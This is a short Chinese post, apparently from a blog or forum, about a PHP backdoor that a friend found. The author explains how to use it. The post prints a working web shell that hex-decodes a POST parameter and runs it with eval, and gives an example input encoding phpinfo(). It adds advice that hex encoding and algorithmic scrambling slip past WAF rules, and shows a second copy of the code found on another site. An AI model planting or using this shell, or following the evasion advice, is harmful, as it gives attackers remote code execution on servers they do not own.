朋友发现一个后门文件,让我看看如何使用。
使用了hex编码进行加密,这样完全可以过各种防护。如果防护加了规则,那就加点算法扰乱,感觉通过正则WAF时代要过去了。。。没什么卵用,太难防御了。
gutou=706870696E666F28293B phpinfo()
<?php
error_reporting(0);set_time_limit(0);
$GuTou=@$_POST["gutou"];
if($GuTou){
$GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);
$cc="";for($i=0;$i<strlen($GuTou);$i+=2)
$cc.=urldecode("%".substr($GuTou,$i,2));
@eval($cc);exit;
}
?>
另外一个网站发现这样的代码:
$GuTou=@$_POST["gutou"];
if($GuTou){
$GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);
$cc="";for($i=0;$i<strlen($GuTou);$i+=2)
$cc.=urldecode("%".substr($GuTou,$i,2));
@eval($cc);exit;
